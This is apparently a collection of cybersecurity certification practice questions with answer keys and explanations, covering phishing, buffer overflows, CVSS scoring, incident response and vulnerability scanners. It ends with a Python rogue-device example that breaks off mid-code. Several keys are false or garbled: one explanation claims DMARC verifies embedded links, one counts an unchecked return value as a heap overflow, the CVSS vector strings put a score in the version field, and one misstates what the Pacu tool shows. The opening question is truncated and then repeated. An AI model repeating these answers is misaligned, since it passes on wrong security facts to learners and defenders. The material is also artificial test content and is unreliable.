An IT security analyst is verifying a coworker's email containing a link to a new report. The email seems legitimate, but the analyst notices that the link is obfuscated, suggesting it may be part of a social engineering attack designed to compromise the organization's security. What is the role of obfuscated links in social engineering attacks, and how do they impact IT security operations? (Select the three best options.) A. Obfuscated links are hyperlinks that have been intentionally broken to disrupt the flow of traffic and deny access to specific webpages. B. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. C. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. D. Social engineering attacks often use obfuscated l

B. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. C. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. D. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. Social engineering attacks rely on the exploitation of human vulnerabilities, such as trust and curiosity, to gain unauthorized access to sensitive information or networks. Attackers often use obfuscated links in phishing attacks using social engineering to trick users into clicking on a link that leads to a fake website designed to steal personal information. Attackers often use obfuscated links in social engineering attacks to redirect users to malicious websites that can infect their devices with malware or steal login credentials.

A web application that requires user authentication has a security vulnerability that allows an attacker to send a specially crafted login request that contains more data than the application can handle. The application does not properly validate the input and attempts to write the excess data beyond the end of a fixed-size region of memory allocated at the application start time. As a result, the region of memory overflows, overwriting critical program data and allowing the attacker to execute arbitrary code on the server. What type of vulnerability does this situation describe? (Select the two best options.) A. Heap overflow B. Stack overflow C. Buffer overflow D. Integer overflow

B. Stack overflow C. Buffer overflow Stack overflow is a software vulnerability that occurs when a program tries to store more data in the stack, a fixed-size buffer, than it can handle. Buffer overflow is an attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory. Buffer overflow is a general term referring to both heap and stack overflows.

A company has recently implemented a program to encourage ethical hackers to identify vulnerabilities in their systems. An independent cybersecurity researcher has discovered a critical vulnerability that could potentially compromise the company's user data. What is the responsible and ethical action for the researcher to take? A. Conduct adversary emulation to determine whether an APT could gain access B. Submit the findings to the company's bug bounty program C. Conduct penetration testing to see how much information is at risk from the vulnerability D. Conduct security control testing to determine the effectiveness of controls mitigating this vulnerability

B. Submit the findings to the company's bug bounty program Bug bounties identify elements of the environment that are in scope for testing and the rewards available for reporting issues. Using an independent (external) vulnerability researcher indicates that this is a bug bounty program.

A large retail chain has experienced a cyber attack that has resulted in the theft of customer credit card information. Which of the following factors should the retail chain consider when assessing the impact of the incident? (Select the three best options.) A. The physical damage to company assets B. The financial cost of the incident to the company C. The reputational damage to the company D. The legal and regulatory consequences of the incident

B. The financial cost of the incident to the company C. The reputational damage to the company D. The legal and regulatory consequences of the incident When assessing the impact of a cyber attack, it is important to consider the financial cost of the incident to the company, as this is the most common metric to quantify business impact; the reputational damage to the company, as this can impact potential future revenue; and the legal and regulatory consequences of the incident, as these can produce fines and add to the financial cost of the incident.

A security analyst discovers a malicious process running on one of the servers exfiltrating data to an external IP address. The process has not been detected by the antivirus software. Which of the following is the most likely reason that the malicious process was able to exfiltrate data undetected by the antivirus software? A. The antivirus software was not up-to-date. B. The malicious process was disguised as a legitimate system file. C. The antivirus software was not configured to detect this type of threat. D. The antivirus software was disabled by the attacker.

B. The malicious process was disguised as a legitimate system file. The malicious process exfiltrated the data, and the software did not detect it because it appeared to be a legitimate system file. This is a technique commonly used by attackers to evade detection by security software.

An organization discovers that a threat actor has exploited a vulnerability in its web server's software and needs to create a timeline of the incident for regulators and internal stakeholders. Which of the following is the most important factor to consider when creating the timeline? A. The time of day the attack occurred B. The order of events during the attack C. The type of attack that was used D. The length of time the attack lasted

B. The order of events during the attack Creating a timeline that accurately reflects the order of events during the attack is critical to understanding the attack and identifying potential weaknesses in the organization's security posture.

What should organizations prioritize when selecting tools for vulnerability reporting? A. The cost of the tools B. The reporting needs of the organization C. The complexity of the tools D. The number of vulnerabilities identified

B. The reporting needs of the organization When selecting tools for vulnerability reporting, organizations should prioritize their own reporting needs over other factors, such as the tools' cost, the tools' complexity, or the number of vulnerabilities identified.

The systems security officer reviewed a recent Common Vulnerability Scoring System (CVSS) report with a score of 9.4. The report for a newly deployed virtual appliance described issues with the physical and network attack vectors. The report also provided metrics such as Privileges Required (PR) with a value of 'N' and User Interaction (UI) with a value of 'N.' What can the security officer share with the appliance administrators to better secure the system immediately? A. Verify physical access logs to server racks B. Use only Active Directory (AD) groups and/or configure roles C. Setup data-at-rest encryption for the SQL database D. Setup a new local account with a complex password

B. Use only Active Directory (AD) groups and/or configure roles The PR metric with a value of 'N' (none) suggests that a guest or anonymous user has access and can exploit more vulnerabilities. Setting up roles or permissions can prevent full access and mitigate most of the vulnerabilities.

An employee downloads a file attachment from a supposed coworker. The file was in reality a virus that had to be executed first to initiate the attack. Which exploitability metric would score high in a vulnerability assessment of the employee's workstation? A. Attack vectors B. User interaction C. Attack complexity D. Privileges required

B. User interaction Exploitability is the ease and likelihood of exploiting a vulnerability that involves an attack vector, attack complexity, privileges required, and user interaction. User interaction (UI) refers to exploiting the vulnerability depending on some local user action, such as executing a file attachment.

A security analyst is responsible for assessing vulnerabilities in the organization's network infrastructure. Which method would best complement their efforts to identify weaknesses effectively? A. Conducting regular security audits B. Utilizing vulnerability assessment tools C. Implementing continuous monitoring processes D. Performing penetration testing

B. Utilizing vulnerability assessment tools Vulnerability assessment tools scan systems and networks for potential weaknesses and vulnerabilities, helping the analyst identify areas that need improvement.

A penetration tester completed a credentialed vulnerability scan against a cloud-based software application used by their client company. The penetration tester discovered multiple vulnerabilities through the scan; however, none matched an available tool. What exploitable vulnerabilities would the penetration tester NOT discover through a credentialed vulnerability scan? A. Insecure API B. Zero-day C. Security misconfiguration D. External

B. Zero-day A zero-day represents an exploitable vulnerability with no available patch. A credentialed vulnerability scan would not discover a zero-day since a zero-day is not yet publicly known, and thus the penetration tester would not include it in the scan criteria.

Which of the following scenarios is an example of a heap overflow? (Select the two best options.) A. A program fails to sanitize user input, leading to a SQL injection attack. B. A program attempts to write data beyond the end of a fixed-size buffer. C. A program allocates memory to a dynamic buffer without proper bounds checking, leading to a buffer overflow. D. A program fails to check the return value of a function that could fail, leading to unpredictable behavior.

C. A program allocates memory to a dynamic buffer without proper bounds checking, leading to a buffer overflow. D. A program fails to check the return value of a function that could fail, leading to unpredictable behavior. Heap overflow is a software vulnerability in which the system allows input to overwrite memory locations within the area of a process's memory allocation that stores dynamically sized variables. Because the buffer is dynamic, this is a heap overflow. Buffer overflow is an attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory; the term refers to both heap and stack overflows. Failing to check the return value of a function that could fail also opens the door to a buffer overflow.

When using the Pacu tool to test the Amazon Web Services (AWS) account for open vulnerabilities, the external security team gained a session token and carried out other vulnerability tests on the AWS account. Although the security team could perform tests on the account for only an hour, what would be the most alarming conclusion about this test case? A. The web IAM dashboard shows findings. B. Domain POCs are publicly known. C. Access was granted without knowing passwords. D. Public entities are easily mapped for social engineering.

C. Access was granted without knowing passwords. The Pacu tool's iam_enum_roles module remotely discovers roles based on a dictionary attack. Obtaining the session token in this case suggests that the accounts have dictionary passwords and are easy targets for threat actors.

While investigating malicious activity against their organization, an analyst establishes that a malicious actor is using anti-forensic techniques to evade detection. What type of actor is most likely responsible for this activity? A. Script kiddie B. MITRE ATT&CK C. Advanced persistent threat (APT) D. Command and control (C&C)

C. Advanced persistent threat (APT) APT describes the type of activity conducted by advanced cyber actors. This designation is most often associated with organized criminals and nation-states since it requires significant resources and coordination.

After a quick scan of a target URL, a security analyst is looking for detailed information in the dashboard about a few issues found in the "issue activity" panel of the Burp Suite tool's integrated web browser. Where can the security analyst find help to resolve those same issues? A. Event log panel B. Spider tab C. Advisory tab D. Alerts tab

C. Advisory tab The advisory tab is available after clicking on a finding in the "issue activity" panel. The advisory tab shows issue detail, background, and severity information.

A company has been targeted by a distributed denial-of-service (DDoS) attack, resulting in its website and online services being unavailable. Upon investigation, it is discovered that the attack originated from multiple sources and was directed at a specific set of targets. What is the most likely metric that the organization will use to measure the impact of this attack? A. Risk score B. Recurrence C. Affected hosts D. Mitigations required

C. Affected hosts

After a recent audit demonstrated system vulnerabilities, an organization tasked a cyber security specialist with performing a vulnerability scan across their system. Which method should the specialist use for collecting data from endpoints across the network using SSH protocol? A. Agent B. Passive C. Agentless D. Active

C. Agentless Agentless scans can be the simplest to implement, as the scanner can collect information from endpoints using protocols such as secure shell (SSH), Windows Management Instrumentation (WMI), or Simple Network Management Protocol (SNMP) without the use of dedicated software.

The security team at a large organization is analyzing a recent cyberattack that targeted their network infrastructure. They must focus on the attack stages and the relationships between the adversary, infrastructure, and capabilities to understand the attack and plan for future security measures. What should the security team prioritize to address the current situation effectively and improve their security operations? A. Conducting a thorough vulnerability assessment of their systems B. Implementing strict access control policies and procedures C. Analyzing the attack using the Diamond Model of Intrusion Analysis and the cyber kill chain D. Deploying advanced intrusion detection systems

C. Analyzing the attack using the Diamond Model of Intrusion Analysis and the cyber kill chain By using the Diamond Model of Intrusion Analysis and the cyber kill chain, the security team can make informed decisions and improve their security operations.

An unauthenticated attacker exploited a company's web portal that contains customer information, where customers can view their account profile, such as their name, email address, and account balance. Each customer has a unique ID used to retrieve their information from the database. However, the attacker changed the customer ID parameter in the URL to access customers' information. What kind of web application vulnerability did the attacker exploit? A. Security misconfiguration B. Software and data integrity failures C. Broken access control D. Injection

C. Broken access control Broken access control is a common vulnerability in web applications that can allow attackers to access sensitive data or perform unauthorized actions, such as manipulating the URL.

A company realizes that an attacker has persistent access to several internal servers. What team is best prepared to react to this? A. Threat hunters B. Hacktivists C. CSIRT D. General counsel

C. CSIRT Computer security incident response team (CSIRT) is a group of security professionals with a wide variety of specialties who respond to security incidents quickly and effectively.

A network administrator assesses multiple attack vectors revealed from a recent vulnerability scan of the organization's cloud-based software. Which of these CVSS scores presents the greatest threat to Confidentiality? A. CVSS:2.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H B. CVSS:7.9/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L C. CVSS:3.2/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N D. CVSS:9.3/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

C. CVSS:3.2/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N CVSS: 3.2 ... C:H indicates a Common Vulnerability Scoring System (CVSS) score of 3.2 and a Confidentiality impact of High (C:H). For it to present the greatest threat to Confidentiality, it must also reference a high impact value, noted as C:H.

How are cloud system and network architecture concepts essential for securing hybrid and on-premises systems? A. Cloud system and network architecture concepts are optional and not necessary for securing hybrid and on-premises systems. B. Cloud system and network architecture concepts make securing hybrid and on-premises systems more complex and difficult. C. Cloud system and network architecture concepts enable organizations to consolidate and streamline their security operations, regardless of where their data resides. D. Cloud system and network architecture concepts only apply to cloud-based systems and do not provide any benefits for on-premises systems.

C. Cloud system and network architecture concepts enable organizations to consolidate and streamline their security operations, regardless of where their data resides. Cloud system and network architecture concepts provide a unified security framework that applies across hybrid and on-premises systems, enabling organizations to streamline their security operations.

While assessing the effectiveness of their security operations center (SOC), an organization realizes they are lacking effective team coordination. What are some things they could implement to improve coordination? (Select the two best options.) A. APIs B. A SOAR C. Communication skills training D. Information sharing SOPs

C. Communication skills training D. Information sharing SOPs Members with a variety of specialties make up a SOC. For the team to be effective, each of the members must be an effective communicator. SOPs for sharing information among team members ensure effective communication procedures are in place. These are especially important during crises.

A company has hired a consulting firm to conduct penetration testing on their network. As the PenTest team begins testing, they notice significant network traffic to and from a private IP address they do not recognize. What should be their next step? A. Conduct edge discovery to identify other potential targets and vulnerabilities B. Conduct host discovery to identify other potential targets and vulnerabilities C. Conduct a passive discovery to identify potential vulnerabilities D. Conduct network discovery to identify other potential targets and vulnerabilities

C. Conduct a passive discovery to identify potential vulnerabilities Passive discovery is a practical next step for the IT team. Passive discovery uses indirect methods to identify systems, services, and protocols. The team can conduct a passive discovery to learn more while maintaining network functionality.

After an incident, the incident response team wants to determine the underlying reason why the incident was able to happen. Which of the following steps should the team take to achieve this? A. Describe the impact on customers and partners B. Conduct a timeline analysis C. Conduct a root cause analysis D. Notify customers

C. Conduct a root cause analysis Conducting a root cause analysis can help the incident response team identify the underlying cause of the incident and develop measures to prevent future incidents.

A software development company is conducting training sessions for its employees to improve their security awareness. The company aims to ensure that the training is effective and helps prevent future security incidents. How can the company incorporate lessons learned from past security incidents to contribute to the training program's success? A. Demonstrate the consequences of security breaches B. Enhance the understanding of security policies C. Conduct tabletop exercises based on scenarios of past incidents D. Identify gaps in security awareness

C. Conduct tabletop exercises based on scenarios of past incidents By simulating the incidents in a controlled environment, like a tabletop exercise, employees can practice their incident response skills and test the effectiveness of the company's security policies and procedures.

A security analyst at an insurance company needs to evaluate the effectiveness of the organization's incident response activities. What should the analyst do to best assess the performance of the incident response team? A. Reviewing playbooks B. Assessing security tools C. Conducting post-incident reviews D. Conducting penetration tests

C. Conducting post-incident reviews Post-incident reviews involve analyzing the incident response process, identifying areas of improvement, and implementing changes to enhance the team's effectiveness in handling future incidents. This comprehensively evaluates the team's performance and ability to respond to incidents.

A security analyst is responsible for ensuring a company's serverless infrastructure is secure. Recently, the company had a data breach due to a misconfigured serverless function. Which security measure should the analyst implement to prevent future data breaches on the company's serverless infrastructure? A. Implement network segmentation B. Deploy a firewall C. Configure access control D. Use intrusion detection system (IDS) to monitor functions

C. Configure access control Configuring access control on serverless functions is essential to prevent unauthorized access to the company's data.

A financial organization is exploring special considerations in vulnerability scanning to enhance its security posture. After discovering a security breach, the organization focuses on remediation and maintaining the chain of custody for legal purposes. Which actions would be most appropriate for the organization to ensure effective remediation while preserving the chain of custody? A. Re-image affected systems B. Establish a security operations center (SOC) C. Create a detailed incident response plan D. Use a cloud access security broker (CASB)

C. Create a detailed incident response plan A comprehensive incident response plan outlines remediation efforts and preserves the chain of custody for legal purposes. This plan ensures that the organization handles incidents effectively while maintaining the integrity of digital evidence.

A security operations center (SOC) manager identifies a considerable amount of time is being wasted by switching between different consoles. What is one way to update operations to mitigate this issue? A. Start threat hunting B. Engage in risk management C. Create a single pane of glass D. Improve team coordination

C. Create a single pane of glass A single pane of glass is a unified view of the security tools and other related services defending a network. This interface allows network defenders to view and control everything in one place.

A cybersecurity analyst for a large financial services company reviews the company's email security controls and is concerned about the risk of phishing attacks. The analyst decides to implement Domain-based Message Authentication, Reporting, and Conformance (DMARC) to better protect the company's email domain. Which of the following best describes the correlation between embedded links and DMARC? A. DMARC protects against phishing attacks that use embedded links by analyzing email headers. B. DMARC prevents embedded links from being included in emails altogether. C. DMARC verifies the authenticity of embedded links by checking the sender's domain against the DMARC record. D. DMARC only applies to email messages that contain embedded links from untrusted senders

C. DMARC verifies the authenticity of embedded links by checking the sender's domain against the DMARC record. Domain-based Message Authentication, Reporting, and Conformance (DMARC) is an email authentication protocol designed to detect and prevent email spoofing, phishing, and other types of email-based attacks by verifying the authenticity of embedded links and checking the sender's domain against the DMARC record. If the sender's domain fails DMARC authentication, the system can quarantine or reject the email before it reaches the recipient's inbox.

A security operations center (SOC) manager wants to leverage orchestration to improve threat intelligence consumption across the organization. What are some ways in which orchestration can improve the use of threat intelligence consumption? A. APIs B. Webhooks C. Data enrichment D. Plugins

C. Data enrichment Enriching data involves combining feeds from various sources in a single location to provide a better understanding of the threat landscape. Enriched data gives a more complete picture of adversary tools, tactics, and procedures.

A security analyst at a software development company is responsible for identifying potential threats to the organization's network. The analyst recently discovered a misconfigured server hosting one of the company's web applications. Given the potential risk, what should be the analyst's primary focus to ensure network security and system architecture when addressing this situation? A. Implementing security controls based on industry best practices B. Analyzing network traffic for signs of unauthorized access C. Determining the stage of a possible attack and assessing web application vulnerabilities D. Investigating the organization's physical security measures

C. Determining the stage of a possible attack and assessing web application vulnerabilities The analyst should prioritize understanding if an attacker has exploited the misconfigured server, determining the possible attack stage, and evaluating web application vulnerabilities. This focus aligns with the objectives of the cyber kill chain model and the Open Web Application Security Project (OWASP) Testing Guide.

A security analyst is working on improving the organization's cybersecurity posture and needs to analyze a recent attack on their network. The analyst must determine the relationships between the adversary, infrastructure, and attack capabilities while also understanding the attacker's techniques, tactics, and procedures. What should the analyst use to comprehensively understand the attack and enhance the organization's vulnerability scanning methods? A. NIST Cybersecurity Framework and OWASP Top Ten B. Cyber kill chain and CIS Critical Security Controls C. Diamond Model of Intrusion Analysis and MITRE ATT&CK Framework D. ISO/IEC 27001 Information Security Management System

C. Diamond Model of Intrusion Analysis and MITRE ATT&CK Framework The Diamond Model of Intrusion Analysis enables the analyst to understand the relationships between the adversary, infrastructure, and attack capabilities. Meanwhile, the MITRE ATT&CK Framework provides insight into the attacker's techniques, tactics, and procedures.

A government agency had a breach at one of its locations that resulted in stolen hard drives. The virtual servers on the stolen hard drives had data for only one virtual appliance replicating to the secondary virtual appliance remotely. A security investigation report showed that the agency did not set up virtual appliances with data-at-rest security features. What must the system administrators do to ensure another breach does not jeopardize the government? A. Setup backup targets B. Configure high availability C. Encrypt the virtual server D. Setup for disaster recovery

C. Encrypt the virtual server Encryption provides data-at-rest security for virtual and physical servers at the drive level. For example, if a hard drive gets stolen, the data is not recoverable without the decryption keys.

A cybersecurity team is planning to implement automation in their security operations center. Which aspect should they focus on to ensure they can detect and respond to threats quickly? A. Consider the frequency of tasks B. Identify high-risk areas C. Evaluate time-to-detection D. Evaluate the benefits of automation

C. Evaluate time-to-detection Evaluating time-to-detection is how security operations center (SOC) teams measure how long it takes them to detect and respond to security incidents.

A large corporation experienced a data breach in which a perpetrator stole sensitive customer information. During the incident response process, the team discovered potential suspects. Which is the most crucial factor in determining the perpetrator of the breach? A. Stakeholders impacted B. Incident declaration C. Evidence D. Timeline of breach

C. Evidence In a cybersecurity incident response, the most crucial factor in determining the perpetrator of a breach is the evidence. Evidence such as network logs, device logs, and forensic analysis can provide proof of the perpetrator's identity.

An IPS permits a connection between a Domain Controller and a user device in the domain on port 445. A domain-enabled account then authenticates to the user device, accesses sensitive data, and transmits it over a Wide Area Network (WAN). What is the type of error in this situation? A. False positive B. True positive C. False negative D. True negative

C. False negative The intrusion prevention system (IPS) produces a false negative error when it fails to detect a vulnerability or intrusion that is actually present. Identifying and managing false negatives is important because it reduces the probability of an undetected intrusion into the network.

A growing e-commerce company is concerned about potential cybersecurity threats and has decided to invest in threat-hunting. The company tasks its security team with proactively identifying and mitigating threats before they escalate. Which threat-hunting techniques would be most effective for the security team to prioritize their efforts? A. Analyze historical security incidents B. Conduct vulnerability assessments C. Focus on high-impact and broad-scope threats D. Perform regular log analysis

C. Focus on high-impact and broad-scope threats By prioritizing high-impact and broad-scope threats, the security team can concentrate on addressing the most significant risks that could potentially affect a large portion of the organization's assets or operations.

A security analyst reviews the logs of a web server for suspicious activity and notices that someone sent a message to the server with a header that had unusual metadata. Which of the following statements best explains the difference between hashing and headers in security operations? A. Hashing generates unique digital representations of data, while headers encrypt the data. B. Hashing and headers both add metadata to data packets, but hashing only adds metadata to the header, while headers add metadata to the entire packet. C. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. D. Hashing and headers both identify the location of a message or data packet in a network.

C. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. Hashing, a process used in security operations, creates a unique digital representation of data. Headers contain information such as the source and destination of the message, the type of data someone is sending, and other information relevant to the transmission of the data.

A hacker launches an attack that requires specialized knowledge and tools, including significant time and resources. What is the Attack Complexity score for this attack as part of the CVSS framework? A. Low B. Critical C. High D. Medium

C. High Attack complexity refers to the difficulty of the attack techniques used by a threat actor. Therefore, a high score is appropriate since the attack requires specialized knowledge, resources, and the time to succeed.

A security team has conducted a vulnerability scan on their organization's systems and generated a detailed list of affected hosts. The team needs to share the report with the IT department, but they want to make sure it is easy to view in a browser. Which format should the security team choose for the vulnerability report to ensure it is visually appealing and the IT department can view it in a browser-based dashboard? A. Comma Separated Values (CSV) B. EXtensible Markup Language (XML) C. HyperText Markup Language (HTML) D. Plain text

C. HyperText Markup Language (HTML) HyperText Markup Language (HTML) based reports are more visually appealing than plain text reports and can be viewed in a browser due to improved organization and viewing properties.

A company's online ordering system uses a username and password to authenticate users. However, the password requirements are weak, and the usernames are all publicly available e-mail addresses of customer businesses. As a result, an attacker can easily guess or brute-force the passwords and gain access to sensitive information. What type of vulnerability does this situation describe? A. Broken access control B. Software and data integrity failures C. Identification and authentication failures D. Cryptographic failures

C. Identification and authentication failures Identification and authentication failures are security vulnerabilities where systems or applications fail to properly verify user identity, allowing unauthorized access. This failure can result from weak or easily guessable passwords, lack of multifactor authentication, or insufficient verification of credentials.

A company that has experienced a breach needs to determine the customers whose personal information was exposed and the employees involved in the breach. The company must also communicate with the regulators and law enforcement agencies investigating the breach. To satisfy regulators, the company also needs to provide information about the steps it is taking to mitigate the damage and prevent future breaches. What does this process describe? A. Identifying and reporting an incident B. Establishing who, what, when, where, and why the incident occurred C. Identifying and communicating with all stakeholders D. Creating recommendations on reducing vulnerability

C. Identifying and communicating with all stakeholders Stakeholder identification and communication are important parts of crisis management. In a data breach, it is important to identify and communicate with all stakeholders affected, such as customers, employees, investors, and regulators.

A security analyst at a large organization is responsible for identifying active threats to the company's network. To effectively monitor and analyze these threats, the analyst decides to use the MITRE ATT&CK framework in conjunction with the cyber kill chain model. The analyst receives an alert about a potential spear-phishing attack targeting employees. When using these frameworks to assess the situation, what should be the analyst's primary focus? A. Analyzing the attacker's post-exploitation activities B. Implementing new security controls based on the MITRE ATT&CK framework C. Identifying the stage of the attack in the cyber kill chain D. Reviewing the company's incident response plan

C. Identifying the stage of the attack in the cyber kill chain The primary focus of the analyst should be to identify the attack stage in the cyber kill chain model. Understanding the stage of the attack helps the analyst determine the scope and potential impact of the threat and guides the response actions accordingly.

A financial services company is updating its incident response plan to better address security incidents. As part of this update, the cybersecurity team wants to emphasize the importance of root cause analysis when investigating incidents. How can incorporating root cause analysis into the incident response plan help the organization better understand the technology involved in security operations? A. Revealing attacker behavior and techniques B. Adhering to regulatory requirements C. Identifying underlying vulnerabilities D. Fostering cooperation among cybersecurity professionals

C. Identifying underlying vulnerabilities Root cause analysis helps the organization better understand the technology involved in security operations by identifying underlying vulnerabilities and weaknesses in their systems and infrastructure.

A security analyst must improve the organization's ability to detect and respond to threats targeting its systems. The analyst looks into various methodologies and frameworks to better understand and identify host indicators that could suggest a compromise. What should be the analyst's main focus to enhance the detection of host-based threats? A. Deploy web application firewalls B. Develop an incident response plan C. Implement host-based intrusion detection systems (HIDS) and analyze system logs D. Implement a data loss prevention (DLP) solution

C. Implement host-based intrusion detection systems (HIDS) and analyze system logs A host-based intrusion detection system (HIDS) and system log analysis are crucial for uncovering host indicators of compromise, in line with the Open Source Security Testing Methodology Manual (OSSTMM) and Open Web Application Security Project (OWASP) Testing Guide methodologies.

A cloud service provider (CSP) conducted a vulnerability assessment on their infrastructure and identified several security issues. The CSP is now looking for effective compensating controls to address these vulnerabilities while minimizing the impact on operations. Which compensating controls would be most suitable for isolating vulnerable systems in the cloud environment? A. Deploy a virtual private cloud (VPC) B. Use security groups to restrict access C. Implement network segmentation D. Establish a screened subnet

C. Implement network segmentation By dividing the network into smaller segments, it restricts unauthorized access, limits the potential impact of an attack, and provides additional protection for sensitive data and critical systems.

A security analyst must improve the organization's detection and response capabilities to potential cyber threats. The analyst is researching different methodologies and frameworks to help them identify network indicators that may signal an ongoing attack. What should the analyst prioritize to enhance the organization's ability to detect and respond to potential threats? A. Perform regular software patching B. Conduct a physical security audit C. Implement network traffic analysis and use threat intelligence D. Establish a centralized logging system

C. Implement network traffic analysis and use threat intelligence Aligning network traffic analysis and threat intelligence with frameworks like Open Source Security Testing Methodology Manual (OSSTMM) and the cyber kill chain can help the analyst better understand attack progression and identify network indicators associated with potential threats.

A company has just experienced a ransomware attack resulting from a remote attacker using employee credentials after compromising them by technical means. The incident response team needs to provide recommendations in the incident report for improving the organization's cybersecurity posture. Which of the following recommendations would be the most effective? A. Upgrading the firewall software B. Running regular vulnerability scans C. Implementing multi-factor authentication D. Conducting security awareness training for employees

C. Implementing multi-factor authentication Multi-factor authentication is a critical security measure that can prevent unauthorized access to systems and data. This recommendation can help the organization strengthen its security posture and prevent future attacks.

A large retail company has identified a cyber attack on its payment processing system. What is their first step in the incident response process? A. Timeline of breach B. Evidence C. Incident declaration D. Stakeholders impacted

C. Incident declaration Incident declaration and escalation involves identifying and reporting an incident to appropriate stakeholders and then escalating it to the next level of response if necessary. It is the first step of the incident response process.

What are the security benefits of using software-defined networking (SDN) and virtualization in a network environment? (Select the two best options.) A. Enhanced network security through hardware-based firewalls B. Improved network performance through optimized routing C. Increased network agility for faster deployment of security controls D. Simplified network segmentation and isolation for easier threat containment

C. Increased network agility for faster deployment of security controls D. Simplified network segmentation and isolation for easier threat containment The agility of SDN and virtualized networks improves security by letting administrators deploy security controls faster and re-segment or isolate workloads through software rather than physical rewiring. That same flexibility makes it easier to contain a threat once it is identified.

An HVAC company's web application allows users to schedule appointments with their HVAC technicians. The application only requires a 4-digit PIN to log in, and the web application sends the PIN over an unencrypted connection over port 80. What type of vulnerability does this situation describe? A. Cryptographic failures B. Broken access control C. Insecure design D. Software and data integrity failures

C. Insecure design Insecure design is a security vulnerability in which a system or application design allows attackers to exploit weaknesses or flaws in the design itself. A design using an unencrypted protocol for authentication is insecure.

A company hires a new employee to work in their IT department. The new employee quickly gains the trust of the other coworkers. However, the company soon notices someone is accessing files without authorization and leaking sensitive information. Which of the following best describes the security threat presented in this scenario? A. Social engineering attack B. Phishing attack C. Insider threat D. Malware attack

C. Insider threat This scenario is most reflective of an insider threat, which is someone who uses their position within a company to gain unauthorized access to information or systems.

A security analyst is conducting security operations for a company's network and notices that some users have complained about slow performance and high memory consumption on their devices. Which of the following is a potential cause of high memory consumption? A. Running multiple applications at the same time B. Running outdated operating system software C. Installing software from unverified sources D. Having insufficient disk space on the device

C. Installing software from unverified sources Installing software from unverified sources can introduce malware or other harmful programs that consume significant system resources, leading to slow performance and high memory consumption on devices.

A cybersecurity professional has identified malicious activity on a workstation within their organization. To effectively address the situation and prevent the spread of the threat, which of the following actions should the professional prioritize? A. Implement stronger password policies across the organization B. Conduct regular security audits to ensure compliance with data protection regulations C. Isolate the affected workstation from the network D. Re-image the affected workstation

C. Isolate the affected workstation from the network Isolating the affected workstation prevents the spread of the threat and allows for further investigation and remediation.

An electrical transmission substation operator observes a computer malfunction. Shortly thereafter, the terminal, the facility, and the surrounding community lose power. A subsequent investigation discovers that, even though the system was on an air-gapped network, an insider threat installed specially designed malware on key control system software. What type of network vulnerability has the insider threat exploited? A. External B. IoT C. Isolated D. Internal

C. Isolated An air-gapped network is another term for an isolated network, one that is physically disconnected from the internet and other public networks. Isolation blocks remote attackers but does nothing against an insider with physical access and removable media, so isolated networks are vulnerable to exactly this kind of hand-carried malware.

A security researcher performs a scan on an isolated network not connected to the internet or any other external network. What is the CVSS score for this vulnerability in terms of Attack Complexity? A. Low B. Medium C. Not applicable D. High

C. Not applicable CVSS Attack Complexity has only two defined values, Low and High, and it describes a specific vulnerability, not a network. The scenario describes a scan of an isolated network but gives no details on any vulnerability or exploit, so there is nothing to score, and the Common Vulnerability Scoring System (CVSS) does not apply.

A front-end developer must harden security for the company's new web application. The developer notices that some vulnerabilities include broken authentication, cross-site scripting, and structured query language (SQL) injection attacks. Which of the following could provide resources to solve the issues afflicting the company's website? A. CIS benchmarks B. ISO 27000 series C. OWASP D. PCI DSS

C. OWASP Open Web Application Security Project (OWASP) is a charity and community organization that publishes several secure application development resources. Its mission is to provide free, open-source tools and resources to help developers and organizations create more secure applications and services.

An information security project manager needs to find resources that promote awareness of web application security issues and develop resources to educate developers and users. In addition, the project manager is looking for these resources to offer various testing tools to help organizations identify and fix security vulnerabilities. Which of the following resources would be best for the project manager to use? A. CIS benchmarks B. ISO 27000 series C. OWASP D. PCI DSS

C. OWASP Open Web Application Security Project (OWASP) is a charity and community organization that publishes several secure application development resources. Its mission is to provide free, open-source tools and resources to help developers and organizations create more secure applications and services.

An information security project manager of a large software firm is in charge of researching alternative vulnerability scanners for the security operations center's (SOC's) reduced budget. At the next stakeholder meeting, the manager proposes several free, open-source software (FOSS). Which of these vulnerability scanners fits the needs of the enterprise business? (Select the two best options.) A. Qualys B. Nessus C. OpenVAS D. OpenSCAP

C. OpenVAS D. OpenSCAP The OpenVAS scanner (openvas.org) is open-source software originally forked from the Nessus codebase before Nessus became commercial software. Its cost efficiency, combined with reporting of CVSS scores for the vulnerabilities it finds, makes OpenVAS a good fit for this scenario. OpenSCAP is an open-source scanner that checks systems against SCAP content (XCCDF benchmarks and OVAL definitions) to identify configuration weaknesses and known vulnerabilities; because CVSS is one of the SCAP component specifications, it can also report a Common Vulnerability Scoring System (CVSS) score for the vulnerabilities it identifies. Qualys and Nessus are commercial products.

A security team found an unidentified device linked to the company's network. The team believes that the device could be a rogue one, and they intend to perform scans and sweeps to identify and eliminate any unauthorized devices on the network. Which two options are the most effective methods of scans or sweeps used to detect rogue devices on a network? (Select the two best options.) A. Port scanning B. Network mapping C. Passive scanning D. Active scanning

C. Passive scanning D. Active scanning Passive scanning is a method that listens to network traffic without actively sending traffic. It can detect rogue devices that are active on the network but not responding to standard requests. Active scanning is a method that sends traffic to a network to identify devices that are active on the network. It is an effective method for identifying rogue devices actively responding to requests.
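The two methods find different things, and the gap between them is itself a signal. The following added example (not part of the original question set) shows the correlation an analyst would do after both kinds of sweep: it learns IP-to-MAC pairs from a constructed passive capture (ARP replies and DHCP leases), takes a constructed list of hosts that answered an active sweep, and compares both against an asset inventory that the example assumes the organization keeps. The log lines, inventory, and addresses are all constructed.

```python
import re

# Constructed asset inventory (assumption: the organization maintains one): MAC -> hostname.
INVENTORY = {
    "aa:bb:cc:00:00:01": "fileserver01",
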